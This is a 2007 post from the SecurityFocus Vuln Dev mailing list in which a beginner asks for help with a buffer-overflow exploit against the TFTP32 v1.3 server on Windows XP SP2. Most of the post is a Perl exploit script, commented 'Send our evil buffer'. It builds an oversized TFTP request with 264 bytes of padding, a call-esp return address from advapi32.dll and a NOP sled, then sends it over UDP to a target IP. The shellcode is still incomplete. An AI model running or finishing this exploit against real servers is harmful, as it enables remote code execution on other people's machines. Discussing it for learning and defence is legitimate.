Vuln Dev
Help needed in TFTP32v1.3 BO Oct 17 2007 05:53AM
wong yu liang (yuliang11 yahoo com)


hi all,
i'm new to bufferoverflow. i've gone thru some basic
examples in bufferover now i'm trying to write my own
exploit based on this software. basically i found this
perl script somewhere on the net. it takes 264 bytes
to overflow with 4 byte extra for the EIP.
i''m using call esp , #0x77e2d9d3 advapi32.dll
winxp sp2 for the RET and i found that i'm still 4
bytes off when i dump the esp register in ollydbg.
i've some examples on the net like "add esp 10, ret 4"
, but i'm not sure what it means.
help someone can enlighten me on this. thanks

use IO::Socket;
$host = "10.10.10.2";#Target IP here
$port = "69";#Target Port Here. TFTP uses udp 69

#0x77e2d9d3 advapi32.dll
$shellcode="\xd3\xd9\xe2\x77";

$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#
NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#
NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#
NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#
NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#
NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#
NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#
NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#
NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#
NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
136

$buf ="\x00\x02";
$buf .= "\x41" x 264;

$buf .= $shellcode;

#Print size of buffer
print "Length: ", length($buf), "\n";

#Try to create socket
$socket = IO::Socket::INET->new(Proto => "udp") or die
"Cannot Create Socket:
$@\n";
$ipaddr = inet_aton($host) || $host;
$portaddr = sockaddr_in($port, $ipaddr);

#Send our evil buffer
send($socket, $buf, 0, $portaddr) == length($buf) or
die "Cannot Send Buffer:
$!\n";
print "All Done\n";

________________________________________________________________________
____________
Be a better Heartthrob. Get better relationship answers from someone who knows. Yahoo! Answers - Check it out.
http://answers.yahoo.com/dir/?link=list&sid=396545433

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus